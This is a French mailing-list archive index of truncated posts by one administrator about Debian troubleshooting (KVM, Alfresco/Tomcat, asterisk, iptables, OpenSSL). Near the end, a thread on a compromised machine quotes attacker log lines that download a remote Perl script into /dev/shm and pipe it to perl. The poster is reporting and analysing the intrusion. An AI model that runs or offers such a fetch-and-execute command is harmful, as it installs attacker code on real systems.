Re: KVM sur host debian

Je vais aller regarder, mais je n'ai pas de snapshot configuré... Enfin, normalement. JB signature.asc Description: OpenPGP digital signature

Re: mingw

Basile Starynkevitch a écrit : > > Le 11/8/24 à 11:34, BERTRAND Joël a écrit : >> Bonjour à tous, >> >> En attendant de réussir à réutiliser ma VM Windows 10, j'ai besoin de >> compiler un utilitaire (un truc que j'ai écrit moi-même en C) pour

mingw

Bonjour à tous, En attendant de réussir à réutiliser ma VM Windows 10, j'ai besoin de compiler un utilitaire (un truc que j'ai écrit moi-même en C) pour qu'il puisse s'exécuter sous Windows. J'ai donc installé mingw. Problème, mon outil est lié avec readline et la compilat

Re: KVM sur host debian

didier gaumet a écrit : > > Apparemment je me trompe: un ls sur une image qcow2 montre l'espace > alloué (virtual size), pas réellement occupé (disk size): > > didier@hp-notebook14:~$ sudo qemu-img info > /home/machines_virtuelles/win10.qcow2image: > /home/machines_virtuelles/win10.qcow2 > file f

Re: KVM sur host debian

didier gaumet a écrit : > Le 08/11/2024 à 08:37, BERTRAND Joël a écrit : > >> Bonjour, >> >> Pas certain du tout : >> >> hilbert:[~/.local/share/libvirt/images] > ls -lh >> -rw--- 1 bertrand users  21G  7 janv.  2023  netbsd10.0.qcow2 >&

Re: KVM sur host debian

didier gaumet a écrit : > Le 07/11/2024 à 23:28, BERTRAND Joël a écrit : > >> En fait, ça démarre. Mais le fonctionnement est erratique. Si je >> laisse >> le truc assez longtemps, j'arrive à l'écran de connexion. Je peux même >> ouvrir un session (qui

Re: KVM sur host debian

didier gaumet a écrit : > Le 07/11/2024 à 17:12, BERTRAND Joël a écrit : >> Bonjour à tous, >> >> Depuis ce matin, j'essaie désespérément de lancer une machine >> virtuelle >> Windows 10 sur une installation KVM. Je précise que cette installatio

KVM sur host debian

Bonjour à tous, Depuis ce matin, j'essaie désespérément de lancer une machine virtuelle Windows 10 sur une installation KVM. Je précise que cette installation fonctionnait parfaitement jusqu'à récemment (je ne l'utilise pas tous les jours). Les images sont sur un disque NF

Re: Alfresco 6.2 et debian/testing

Trouvé. Un strace du processus montre que tomcat essaie d'ouvrir un fichier d'eclipse. Après copie dudit fichier dans /var/lib/tomcat9/lib, ça fonctionne. Mais la moindre des choses qu'on puisse dire, c'est que l'erreur n'était pas très explicite. JB signature.asc Descr

Re: Alfresco 6.2 et debian/testing

Bonsoir, J'ai un peu progressé. Jasper.jar n'est plus fourni par Debian. J'ai donc copié jasper.jar dans /var/lib/tomcat9/lib (j'y avais déjà le connecteur postgresql). Mais je me prends encore l'erreur suivante : 30-Oct-2024 19:16:16.305 GRAVE [ajp-nio-127.0.0.1-8009-exe

Re: [HS] La sécurité de testing (Re: Alfresco 6.2 et debian/testing)

Sébastien NOBILI a écrit : > Bonjour, > > Je ne connais pas ton contexte et donc ma remarque ne sera peut-être pas > pertinente, > mais je la poste quand-même car elle pourrait éveiller la curiosité > d'autres. > > Testing est la branche de Debian avec le niveau de sécurité le plus > faible et ne

Re: Alfresco 6.2 et debian/testing

ajh-valmer a écrit : > On Tuesday 29 October 2024 18:46:42 BERTRAND Joël wrote: > > Ce ne serait pas lié à ta base de données et/ou ton serveur Web ? > (qui sont en relation avec l'ECM). Alfresco se connecte correctement à la base de données (j'ai vérifié, c'

Re: Alfresco 6.2 et debian/testing

didier gaumet a écrit : > Bonjour, > > Avertissement: je n'y connais absolument rien à tout ça: > > une recherche sur le message d'erreur et Alfresco m'a balancé plusieurs > résultat dont ton propre post sur le support Alfresco et ce post-là qui > m"a l'air, de loin, à peu près en rapport avec to

Alfresco 6.2 et debian/testing

Bonjour à tous, J'utilise depuis des années Alfresco sur un serveur testing/amd64. Depuis la dernière mise à jour du serveur qui date de quelques jours, Alfresco ne fonctionne plus et je ne comprends pas pourquoi. La configuration d'Alfresco n'a pas changé. J'ai vérifié ce

Re: Suivre les liens symboliques

er. > > Du côté de "ls" je ne trouve pas. > > Quelle commande "simple" ferait cela ? > > Merci > -- > pierre estrem > -- Bertrand Orvoine

Re: [Sendmail] Apparition de l'authentification sur 127.0.0.1 depuis une mise à jour récente

Je me réponds à moi-même. J'ai trouvé au fin fond du bouquin O'Reilly (Sendmail, 4th edition) une solution : GreetPause:192.168 0 # Pas d'authentification pour 127.0.0.1 Srv_Features:127.0.0.1 ALS Je demande donc à sendmail de ne pas proposer AUTH (A), de ne pas nécessit

[Sendmail] Apparition de l'authentification sur 127.0.0.1 depuis une mise à jour récente

.0 Ready to start TLS >>> EHLO rayleigh.systella.fr 250-rayleigh.systella.fr Hello smmsp@localhost [127.0.0.1], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-DELIVERBY 250 HELP >>> VERB 250 2.0.0 Verbose mode >>

Re: [HS] sauvegarde sur Disque Mécanique ou SSD

ajh-valmer a écrit : > On Saturday 06 July 2024 10:56:54 benoit wrote: >> Le vendredi 5 juillet 2024 à 22:19, Dethegeek a écrit : >>> C'est une bonne question. Comment est déterminé le MTBF ? >>> Par experimentation sur des exemplaires avant mise en production >>> de masse, par simulations ? >

Re: [HS] sauvegarde sur Disque Mécanique ou SSD

Sébastien Dinot a écrit : > À l'époque où l'on gravait encore des DVD, je me souviens qu'un > fabricant proposait des DVD en verre, vendus une fortune, dont la durée > de conservation annoncée était de 4 000 ans. 1/ On grave toujours des DVD (et d'autres supports optiques). 2/ Le s

Re: [HS] sauvegarde sur Disque Mécanique ou SSD

Dethegeek a écrit : > C'est une bonne question. Comment est déterminé le MTBF ? Par > experimentation sur des exemplaires avant mise en production de masse, > par simulations ? > > Un MTBF DE 2.5 millions d'heures équivaut à 285 ans. Soit j'ai fait un > erreur de logique pour calculer soit cette v

Re: [HS] sauvegarde sur Disque Mécanique ou SSD

benoit a écrit : > Le vendredi 5 juillet 2024 à 21:56, benoit a écrit : > >> J'ai regardé les disque durs avec une moyenne de 2 500 000 h avant panne, >> c'est pas donné. Le moins chers que j'ai trouvé est à 240€ pour un Toshiba >> MG07ACA de 14 To et en plus c'est du 3,5 pouces et mon rack c'e

Re: [Un peu HS] Utilisation de l'API OpenSSL

J'ai enfin réussi à avoir un retour des devs d'OpenSSL. Il faut dans leur technique de détection des fins de message toujours au moins un octet de bourrage. Donc si le message fait un multiple entier d'une longueur de bloc, on se tape un bloc entier en bourrage. Une fois expliqué, c'est ass

Re: [Un peu HS] Utilisation de l'API OpenSSL

didier gaumet a écrit : > Le 04/07/2024 à 20:44, BERTRAND Joël a écrit : >> didier gaumet a écrit : > [...] >>> https://stackoverflow.com/questions/71763461/purpose-of-evp-encryptfinal-ex-function-in-openssl >>> > [...] > >> Ce que je ne saisis pas, c

Re: [Un peu HS] Utilisation de l'API OpenSSL

didier gaumet a écrit : > préambule lamentable: j'ai lu ta bafouille en diagonale, je n'ai pas le > niveau, j'ai pas envie de creuser, etc... donc ma réponse ne va > peut-être pas être très pertinente, désolé ;-) > > En très gros de la part d'un inculte du sujet, même si la fonction > openssl semb

[Un peu HS] Utilisation de l'API OpenSSL

Bonjour à tous, Désolé de venir avec un problème pas tout à fait Debian. J'essaye de m'inscrire sur les listes de diffusion OpenSSL depuis plusieurs jours sans aucun retour. Je pense que des lecteurs ont déjà été confrontés au problème. J'utilise OpenSSL (3.3.1) pour chiff

Re: Fail2ban testing

Olivier a écrit : > Quelques pistes: > - soit n'arrive pas à accéder à une ressources parce qu'une autre > instance de fail2ban ou d'un service, a déjà l'accès exclusif à cette > ressource > - soit un simple problème de droits d'accès sur cette ressource > (droits sur le fichier, son répertoire, ..

Fail2ban testing

Bonjour à tous, Je viens de mettre un serveur de test à jour et fail2ban râle. Je ne vois pas ce qui ne lui plaît pas d'autant qu'il n'est pas verbeux. Ma configuration fail2ban fonctionne parfaitement avec la version 1.0.2-2. Avec la version poussée dans testing (1.1.0-4)

Re: virt-manager (qemu/kvm) et virtiofs

didier gaumet a écrit : > Le 12/06/2024 à 10:31, BERTRAND Joël a écrit : >> Bonjour à tous, >> >> Je dois faire quelques tests avec une imprimante 3D et un logiciel ne >> fonctionnant que sous Windows. J'ai donc installé W10 dans une machine >> virtuel

virt-manager (qemu/kvm) et virtiofs

c virtiofs (virtio-9P ne semble pas fonctionner). Je me prends l'erreur suivante : Erreur lors du démarrage du domaine: internal error: process exited while connecting to monitor: 2024-06-12T08:29:18.308752Z qemu-system-x86_64: -chardev socket,id=chr-vu-fs0,path=/home/bertrand/.config/l

Re: libwxgtk3.2-1t64 et fichiers d'en-têtes

didier gaumet a écrit : > Le 06/05/2024 à 09:42, BERTRAND Joël a écrit : > [...] >> Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier >> d'en-têtes >> semble être libwxgtk3.2-dev qui veut désinstaller libwxgtk3.2-1t64 pour >> remettre libw

Re: libwxgtk3.2-1t64 et fichiers d'en-têtes

Basile Starynkevitch a écrit : > > On 5/6/24 09:42, BERTRAND Joël wrote: >> Bonjour à tous, >> >> Il vient d'y avoir une salve de bibliothèques avec une extension t64 >> (pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait

libwxgtk3.2-1t64 et fichiers d'en-têtes

Bonjour à tous, Il vient d'y avoir une salve de bibliothèques avec une extension t64 (pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait-il où trouver les fichiers d'en-tête correspondant ? Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier d'en-

Re: Re : Re: Linux mobilise désormais 15 % de parts sur les desktops en Inde, une performance qui contraste avec les 4 % à l'échelle globale

Gabriel Moreau a écrit : > Vrai pour Apple dont le noyau Darwin est un dérivé des BSD. Non, le noyau est un micronoyau avec des serveurs de type Unix par dessus (du code pompé à Free et NetBSD). C'est le pire truc qui puisse exister. > Faux pour > Windows qui n'a rien d'UNIX. Windows NT a

Re: [semi-HS] Conseil sur l'exploitation d'un serveur DNS

François TOURDE a écrit : > Le 19846ième jour après Epoch, > Olivier écrivait: > >> Bonjour, >> >> J'envisage de mettre en place un serveur DNS dont le rôle serait de >> résoudre des requêtes sur un de mes domaines. > > Il y a des chances que ton registrar te propose son propre DNS. Pourquoi > ne

Re: GPIO (CY7C65211)

didier gaumet a écrit : > > Bonjour, Bonsoir, > avertissement: je n'y connais absolument rien et je réponds peut-être au > moins en partie à côté de la question que tu poses L'essentiel est de participer ;-) Plus sérieusement, merci d'apporter un nouvel éclairage sur le

GPIO (CY7C65211)

Bonjour à tous, Je viens de câbler une interface USB vers RS232 + GPIO qui fonctionne avec un composant CY7C65211. Celui-ci est reconnu comme un thermomètre par le noyau Linux. J'ai donc rajouté une règle udev pour corriger cela : KERNEL=="*", SUBSYSTEM=="usb", ENV{DEVTYP

Re: Reverse ftp proxy

NoSpam a écrit : > Bonsoir > > Le 26/03/2024 à 18:13, BERTRAND Joël a écrit : >> [...] >> >> Deuxième question : le serveur FTP est un OS un peu spécial qui ne >> comprend pas IPv6. Est-il possible de rediriger IPv6 sur du V4 de >> manière transpar

Reverse ftp proxy

Bonjour à tous, J'essaie d'installer sans succès un reverse ftp proxy et je me demande si ce que je cherche à faire est possible. Configuration : IP publique --- serveur frontal Linux --- LAN --- serveur FTP anonyme L'IP publique est propre au serveur FTP que je

Re: apt pas content

Bonjour, Il y a un gros problème avec gnutls mais je pensais que ça se limitais à testing. J'ai réussi à m'en sortir hier en forçant l'installation de la mise à jour de gnutls et de ses dépendances et en _réinstallant_ le reste qui a été viré par un dist-upgrade. Seul cups est touj

Disparition de sensord

Bonsoir à tous, je viens de m'apercevoir que sensord n'est plus disponible dans les dépôts. C'était une chose très pratique qui balançait dans syslog les sorties de sensors lorsqu'il y avait une alarme de température. Par quoi est-ce que cela a été remplacé, je ne trouve rien...

Re: utilisation de nis et nfs pour un réseau de 32 postes

Je ne sais pas pourquoi je ne peux pas avoir la copie du mail dans la réponse. On va donc copier à la main. >Pour l’architecture globale, si je comprends bien c’est : Un serveur de fichiers sous un *nix contenant à la fois les boot des PC et leurs données Des postes sans disque (po

Re: utilisation de nis et nfs pour un réseau de 32 postes

zithro a écrit : > On 24 Feb 2024 23:23, BERTRAND Joël wrote: >> Un gros serveur sous NetBSD et toutes les stations sont diskless et >> bootent sur le réseau. Les disques sont en NFS et les swaps en iSCSI. > > Peux-tu expliquer ce choix (NFS vs iSCSI) stp ? Oui,

Re: utilisation de nis et nfs pour un réseau de 32 postes

Basile Starynkevitch a écrit : > > On 2/23/24 12:02, Erwann Le Bras wrote: >> >> Bonjour >> >> Peut-être faire des essais avec SSHFS? le $HOME des utilisateurs >> serait monté sur chaque client au boot. >> >> Mais je ne sais pas si c'est plus efficace que NFS. >> > > J'aurais tendance à imaginer

Re: Plus de framebuffer/X

C'est bien le fait de ne pas avoir usrmerge qui est le fautif parce que les scripts d'installation ne contiennent plus le PATH canonique ! Je ne dirais pas ce que je pense. signature.asc Description: OpenPGP digital signature

Re: Plus de framebuffer/X

Michel Verdier a écrit : > Le 8 janvier 2024 BERTRAND Joël a écrit : > >> J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais >> dans /usr/sbin (contrairement à ce qu'indique la page man). > [...] >> Que les devs de Debian f

Re: Plus de framebuffer/X

Bon. J'ai un début de piste et ça commence à être gavant. J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais dans /usr/sbin (contrairement à ce qu'indique la page man). Là, on se retrouve avec des PATH dans des scripts de démarrage qui ne conti

Re: Plus de framebuffer/X

ajh-valmer a écrit : > On Sunday 07 January 2024 19:47:19 BERTRAND Joël wrote: >> ... apt dist-upgrade (qui s'est achevé sans erreur). >> Aujourd'hui, je rallume la machine en question et je n'ai plus de >> session graphique ... : > > Sans doute, suite à

Re: Plus de framebuffer/X

Michel Verdier a écrit : > Le 7 janvier 2024 BERTRAND Joël a écrit : > >> Hier, j'ai du configurer ce qu'il fallait pour pouvoir accéder à des >> bluerays. Très bien, ça fonctionnait. Mais pour cela, j'ai du passer un >> apt dist-upgrade (qui s'est

Plus de framebuffer/X

Bonjour à tous et bonne année. Il m'arrive un truc étonnant sur une machine qui me sert de serveur multimedia. Cette machine est diskless et fonctionnait parfaitement jusqu'à hier (pas noté la version du noyau). Ce n'est pas une Debian, c'est une Devuan, mais les paquets et la conf

Re: [Un peu HS] Truc bizarre avec des sockets Linux

Bon, trouvé. Dans tcpServer.c, il faut remonter d'une ligne close(newSocket). Désolé pour le bruit. signature.asc Description: OpenPGP digital signature

Re: [Un peu HS] Truc bizarre avec des sockets Linux

Désolé, j'ai oublié le code serveur. JB #include #include #include #include #include #include #include #include #define PORT int main(){ int sockfd, ret; struct sockaddr_in serverAddr; int newSocket; struct sockaddr_in newAddr; socklen_t addr_size; char bu

Re: [Un peu HS] Truc bizarre avec des sockets Linux

Je viens de reproduire la chose avec deux bouts de programmes écrits en C (voir les deux pièces jointes). hilbert:[~/rpl-test] > ./server [+]Server Socket is created. [+]Bind to port [+]Listening accept(3, 4) Connection accepted from 127.0.0.1:43388 Client: aze Disconnected from 1

[Un peu HS] Truc bizarre avec des sockets Linux

correspond à plusieurs centaines de milliers de connexion sur la socket). Avec 'detach', le programme finit par planter faute de descripteur de socket disponible (trop de fichiers ouverts). Je viens de passer le code dans valgrind et je ne comprends pas bien : Root rayleigh:[~/

Re: Configuration inn

yamo' a écrit : > BERTRAND Joël a tapoté le 17/10/2023 17:10: >> Bonjour à tous, > > Bonjour, > >> >> Je tente la configuration d'inn (parce que depuis que le service chez >> Nerim a été laissé en déshérence, je fais avec celui de free.fr q

Re: Configuration inn

Erwan David a écrit : > Le 17/10/2023 à 17:05, BERTRAND Joël a écrit : >> Bonjour à tous, >> >> Je tente la configuration d'inn (parce que depuis que le service chez >> Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est >> à peine

Configuration inn

Bonjour à tous, Je tente la configuration d'inn (parce que depuis que le service chez Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est à peine mieux...) et il y a un point que je ne comprends pas bien. inn est censé se connecter à d'autres serveurs u

Installation de bibliothèques python

Bonjour à tous, J'essaye d'installer une bibliothèque python (et je me souviens pourquoi je hais ce truc, mais c'est une autre histoire). La bibliothèque en question est pcbnewTransition qui a un makefile. Parfait, je sais créer le paquet : [~] > make package Je

Re: [testing] passage du pilote proprio à nouveau

Gaëtan Perrier a écrit : > Par exemple le raytracing ne semble pas supporté sur les cartes AMD > alors qu'il fonctionne sur Nvidia (ainsi que le DLSS) ? Chez AMD, on trouve le FSR qui semble aussi efficace. Quant au raytracing, la carte que j'utilise ne doit pas savoir qu'il n'est pas supp

Re: [testing] passage du pilote nouveau à proprio

ajh-valmer a écrit : > Les cartes Nvidia ont une très bonne qualité de rendu à l'écran. > avec leur pilote, il y a une configuration sophistiquée de la carte, > permettant d'améliorer le rendu (nvidia-settings). > Les pilotes libres n'ont pas cet outil de config. > Seulement, leurs pilotes ne suive

Re: [testing] passage du pilote proprio à nouveau

Gaëtan Perrier a écrit : > Je suis d'accord sur le fond mais le problème c'est que les cartes > NVIDIA, d'après tout ce je lis, semblent être les plus performantes. > Là j'envisage de changer de PC car il commence à atteindre ses limites, > et en cherchant un peu je vois que le support des nouvelle

Re: [testing] passage du pilote proprio à nouveau

ajh-valmer a écrit : > On Tuesday 12 September 2023 23:24:24 Gaëtan Perrier wrote: >> Les pilotes nvidia legacy 390 de sid étant maintenant compatibles avec les >> kernel jusqu'à 6.5 je suis repassé sur le pilote proprio. >> Avec nouveau c'était invivable. > > Je n'ai jamais réussi à faire fonctio

Re: Monitorer la connectivité WAN en vue du re-routage

Michel Verdier a écrit : > Le 25 août 2023 Olivier a écrit : > >> 1. Connaissez-vous un document qui justifie techniquement ces >> "questions de sécurité" ? > > La sécurité en vivant caché :) A l'inverse beaucoup de routeurs répondent > au ping. Si tu fais un traceroute tu le vois bien.

Re: Serveur OpenVPN

Trouvé. C'est l'option comp-lzo qui met le bazar. Je l'avais sur les deux machines clientes (l'une est sur un accès Wanadoo-Santé de 512 kbps, si, si, ça existe /encore/), l'autre sur un accès GPRS. Je n'avais pas cette option côté serveur. Visiblement, jusqu'à la dernière version d'OpenVPN, le ch

Serveur OpenVPN

Bonjour à tous, J'ai un petit souci avec un serveur OpenVPN (qui fonctionnait parfaitement jusqu'ici). Les clients se connectent bien sur le serveur mais rien ne passe sur l'interface tap0. Je n'ai rien de particulier dans les sorties d'OpenVPN (même avec verb=10). Le serv

Re: Connexion impossible sur Tomcat 9 depuis une mise à jour récente

Etienne Vogt a écrit : > > Une possible piste est que tomcat9 a des protections additionnelles par > rapport à tomcat8, donc si on installe une servlet ailleurs que dans les > chemins par défaut, il faut autoriser l'accès dans > /etc/systemd/system/tomcat9.service > > Par ex. pour un IdP Shibbole

Re: Connexion impossible sur Tomcat 9 depuis une mise à jour récente

didier gaumet a écrit : > Le 06/07/2023 à 08:26, BERTRAND Joël a écrit : >> didier gaumet a écrit : >>> Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai >>> indiqué semble justement expliquer comment installer et configurer >>>

Re: Connexion impossible sur Tomcat 9 depuis une mise à jour récente

didier gaumet a écrit : > Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai > indiqué semble justement expliquer comment installer et configurer > *Tomcat* pour le bon fonctionnement d'Alfresco, entre autres les > chemins, mais pas seulement > > Mais bon, j'ai peut-être rien

Re: Connexion impossible sur Tomcat 9 depuis une mise à jour récente

didier gaumet a écrit : > Avertissement: si je n'ai pas répondu à ton précédent message c'est que > je suis totalement inculte sur le sujet > > Y a un paragraphe de la doc Alfresco qui a l'air de s'intéresser aux > aspects du problème qui t'intéresse (regarde à "classpath"): > https://docs.alfresc

Re: Connexion impossible sur Tomcat 9 depuis une mise à jour récente

Bonsoir à tous, Trouvé... Enfin, j'ai trouvé le fautif, mais je ne sais pas trop comment résoudre le problème. J'avais galéré pour installer Alfresco et j'avais utilisé la variable CATALINA_BASE=/opt/alfresco dans /etc/default/tomcat9. Ça fonctionnait très bien. Sauf que

Connexion impossible sur Tomcat 9 depuis une mise à jour récente

Bonjour à tous, Désolé de polluer comme ça la liste depuis hier, mais je galère sur une mise à jour de serveur à la suite d'un déménagement d'infrastructure... J'ai installé il y a plusieurs années un serveur Alfresco, tout d'abord en version 6.0 puis en version 6.1. Initi

Re: Trou dans un firewall (iptables nftable)

NoSpam a écrit : > > Le 03/07/2023 à 15:12, BERTRAND Joël a écrit : >> NoSpam a écrit : >>> Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table >>> nat et filter >> D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ?

Re: Trou dans un firewall (iptables nftable)

NoSpam a écrit : > Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table > nat et filter D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ? JB

Re: Trou dans un firewall (iptables nftable)

Thomas Trupel a écrit : > C'est un comportement normal à mes yeux. > > L'ajout d'une règle avec la target TRACE devrait te confirmer que les > paquets sont bloqués par le firewall. J'obtiens ceci : 2023-07-03T14:37:45.868470+02:00 rayleigh kernel: [705875.038988] TRACE: raw:PREROUTING:policy:2 I

Re: Trou dans un firewall (iptables nftable)

Thomas Trupel a écrit : > C'est un comportement normal à mes yeux. > > L'ajout d'une règle avec la target TRACE devrait te confirmer que les > paquets sont bloqués par le firewall. Dans le cas de SIP, ils sont tout de même récupérés par sngrep : [ ] 359 INVITE 100@1.1.1.1

Re: Trou dans un firewall (iptables nftable)

C'est même pire que ça ! Si je fais un nmap depuis l'extérieur sur le serveur en question, j'obtiens bien : legendre# nmap 192.168.15.18 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-03 14:09 CEST Nmap scan report for 192.168.15.18 Host is up (0.00078s latency). Not shown: 987 filtered tcp p

Re: Configuration asterisk

Je l'ai... Il fallait mettre l'IP du serveur dans contact. Je pense que la doc d'asterisk est parfaite pour quelqu'un qui sait déjà exactement de quoi il retourne, mais pour quelqu'un qui en est à sa première installation, c'est un peu galère. Je vais essayer de rédiger quelque chose pour les déb

Re: Configuration asterisk

NoSpam a écrit : > > Le 03/07/2023 à 12:57, BERTRAND Joël a écrit : >> NoSpam a écrit : >>> Le 03/07/2023 à 12:07, BERTRAND Joël a écrit : >>>> NoSpam a écrit : >>>>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?

Re: Configuration asterisk

NoSpam a écrit : > > Le 03/07/2023 à 12:07, BERTRAND Joël a écrit : >> NoSpam a écrit : >>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ? >>> Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter >

Trou dans un firewall (iptables nftable)

Bonjour à tous, Je suis en train de configurer (péniblement) un serveur asterisk qui est dans un DMZ. Tout le flux entrant sur l'IP publique est naté vers ce serveur, protégé par un firewall iptables et fail2ban. Il s'agit d'iptables et non d'iptables-legacy. Cette machine

Re: Configuration asterisk

NoSpam a écrit : > Je me suis mal exprimé: le SPA arrive bien à appeler les autres postes > ou l'écho test d'Asterisk (extension 600 par défaut si activer) ? > > Si oui, le problème est au niveau d'asterisk, vois mon dernier courriel. Il n'y a que des SPA et ils peuvent tous s'appeler ent

Re: Configuration asterisk

NoSpam a écrit : > Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ? > Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter > l'appel. > > 34. No circuit/channel available > > Renvois STP le context internal Je réponds à toutes les questions dans le même m

Re: Configuration asterisk

NoSpam a écrit : > Ton asterisk (192.168.1.1) qui répond 503 au SPA > > Il faudrait la config complète du SPA J'ai bien une sauvegarde de la configuration, mais ce n'est pas un fichier texte : hilbert:[~] > file SPA112_1.4.1.cfg SPA112_1.4.1.cfg: dBase III DBT, version number 0

Re: Configuration asterisk

NoSpam a écrit : >> Je ne saisis pas comment ces paquets arrivent à passer le firewall. > Ce sont les attaques dont je parlais précédemment. Il semble qu'il y ai > un trou dans le FW. Y'a pas du nat sur le Cisco pour le wan => lan ? Le serveur est en DMZ donc récupère tout ce qui arriv

Re: Configuration asterisk

2.168.10.253:5060;branch=z9hG4bK-4ffc33f;rport From: "BERTRAND Jool" ;tag=cb4b2e70b9274409o0 To: Remote-Party-ID: "BERTRAND Jool" ;screen=yes;party=calling Call-ID: b4303fbc-598e832d@192.168.10.253 CSeq: 101 INVITE Max-Forwards: 70 Contact: "BERTRAND Jool" Expires: 240

Re: Configuration asterisk

NoSpam a écrit : > Ton problème: error 503 Service Unavailable > > Es tu sûr que le service est fonctionnel ?! Es tu sûr de la qualité de > ton lien ? Peux tu basculer en UDP pour tester ? Le serveur en face ne répond pas en UDP. La réponse est donc non. Un point me chagrine. À l

Re: Configuration asterisk

NoSpam a écrit : >> rayleigh*CLI> core set verbose 3 >> Console verbose was OFF and is now 3. >> [Jul  2 23:11:18] WARNING[22514]: res_pjsip.c:2497 set_id_from_hdr: >> CallerID Name 'BERTRAND Jo�l' for number '6001' has invalid UTF-8 >> charac

Re: Configuration asterisk

NoSpam a écrit : > > Le 02/07/2023 à 19:36, BERTRAND Joël a écrit : >> NoSpam a écrit : >>> Le 02/07/2023 à 18:27, BERTRAND Joël a écrit : >>>> [...] >>>> - tous les appels sortants échouent lamentablement ; >>> Poste les logs. En cli, core s

Re: Configuration asterisk

NoSpam a écrit : > > Le 02/07/2023 à 18:27, BERTRAND Joël a écrit : >> [...] >> - tous les appels sortants échouent lamentablement ; > Poste les logs. En cli, core set verbose 3 puis passe un appel en copie > les logs ici >> - les appels entrants font bien sonner l

Re: Configuration asterisk

NoSpam a écrit : > Fallait dire de suite que c'était pour un SPA ! C'est plus délicat mais > cela fonctionne > > 1. d'ou sort le E accolé au 6001 ? De nulle part, c'était un test pour ne pas avoir un identifiant totalement numérique. Je m'occuperai de cela lorsque j'aurai compris

Re: Configuration asterisk

NoSpam a écrit : > sip:6001E@192.168.1.1 > > https://www.asterisk.org/identifying-endpoint-pjsip/ Rien n'y fait. Si je colle 6001 dans le SPA112, j'ai bien une trame qui demande une authentification du login sip:6001E@192.168.1.1. Mais que je colle username=6001E, 6001E@192.168.1

Re: Configuration asterisk

NoSpam a écrit : > Remplace user=6002 par username=SDA112net2501 Dès que je mets autre chose qu'une suite de chiffres, je reçois ceci comme erreur : [Jul 2 15:52:30] NOTICE[9876]: res_pjsip/pjsip_distributor.c:676 log_failed_request: Request 'REGISTER' from '"

Re: Configuration asterisk

NoSpam a écrit : > Bonjour. Bonjour, > chan_sip est deprecated depuis  longtemps et sera retiré avant la fin de > l'année. pjsip est son successeur, évolution obligatoire. > > J'ose espérer que tes ports 506/5061 UDP & TCP ne sont pas ouverts sur > Internet, avec ta configuration tu cour

Re: Configuration asterisk

Bon, j'ai réussi à régler le coup des appels entrants. Le '.' et le '!' ne peuvent pas être utilisés n'importe où et les regex sont un peu tatillonnes. Reste le problème des appels sortants : [User-standard] exten => 6001,1,Dial(SIP/6001) exten => 6002,1,Dial(SIP/6002) exten => _0

Configuration asterisk

Bonjour à tous, Je tente la configuration d'un serveur asterisk et je me noie un peu dans la configuration. Ce que j'ai fait jusqu'à présent : - installation d'un serveur asterisk (20.3.0~dfsg+~cs6.13.40431413-1) ; - configuration du fichier users.conf pour rajouter tous m

Re: iptables vs iptables-legacy

Michel Verdier a écrit : > Et d'ailleurs pourquoi mixer les outils ? Pourquoi ? Mais parce que fail2ban dans sa configuration par défaut s'est mis à utiliser nftables alors qu'il est tout à fait possible d'utiliser un firewall iptables (xtables) par ailleurs. J'ai d'ailleurs modifié ces sc

Re: iptables vs iptables-legacy

NoSpam a écrit : > Bonsoir > > https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft Merci. Mais ça ne répond pas trop à ma question sauf s'il faut comprendre entre les lignes que les paquets passent d'abor

iptables vs iptables-legacy

Bonsoir à tous, J'ai toujours écrit mes firewalls à la main. Aujourd'hui, un script charge au démarrage le contenu de /var/lib/iptables/active au travers de iptables (nf_tables). Or iptables-legacy est toujours disponible. J'avoue avoir un peu de mal à comprendre

Re: Machine vérolée

BERTRAND Joël a écrit : > BERTRAND Joël a écrit : >> OK, je l'ai. >> >> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd >> /dev/shm;wget -O - http://68.235.39.225/sepax|perl >> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]:

Re: Machine vérolée

BERTRAND Joël a écrit : > OK, je l'ai. > > 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd > /dev/shm;wget -O - http://68.235.39.225/sepax|perl > 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd > /dev/shm;wget -O - http://6

Re: Machine vérolée

OK, je l'ai. 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd /dev/shm;wget -O - http://68.235.39.225/sepax|perl 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd /dev/shm;wget -O - http://68.235.39.225/sepax|perl J'ai le script perl (mais vous pouvez au

  1   2   3   4   5   6   7   8   9   10   >